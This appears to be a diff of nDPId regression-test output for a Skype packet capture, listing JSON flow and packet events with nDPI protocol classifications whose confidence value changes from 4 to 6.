00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kxIAAEARaE7AqAEib91NpjLdnEsAK\/dAnFQCl1hxbJqFe\/EoPOrYejcO5KpAaYBpd\/JMh2XsR696PgE="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4mEQAAEARAMrAqAEinTeCpTLdnFoAJC3GnFYCIQGR7TxLVU8tswjr1LACebeVCHQalWySEQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1f9wAAEARGT3AqAEinTeCnTLdnE0AIXYPnFgCFJgmOhVj0TGqdlU73IOUBy59C5OuhQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNkoAAEARwOTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLu3AAAEARO77AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPpIgAAEARUqLAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPxoMAAEARMKfAqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAAA28WwAAEARPrfAqAEinTfrkTLdnFYAInUwnFoCL\/MPOOsaaRslv0+ih8hUClTBOiOZV0s="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAABBiiMAAEARDm3AqAEiQTffGjLdnEQALZMdnFwCzKFKSd3cA9PLS4BXWJFRrjZHyG3cJPIPdrTAqEb6jU8VDg=="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431969679026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679026,"pkt":"0NQSxnP1PBXCt3IOCABFAABLE+cAAEAR40fAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431969679027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679027,"pkt":"0NQSxnP1PBXCt3IOCABFAABL8bEAAEARBX3AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zKQAAEARzHXAqAEinTeClzLdnFEAJhOjnF4CtwUXw\/VWCApVJdrfxkhI5qU9AKuGw3faL7f5"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5dCsAAEARu0zAqAEi1cezqjLdnEsAJQhSnGAC6QwwmBRocZoeU0bscPTURL89AdihxLtaI+k="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lc0AAEARZY3AqAEib91NsDLdnFQAJ2jKnGICi6AMRljZtq+Es\/pWkLbSJ\/TvDoZrPj0F5hXOgQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 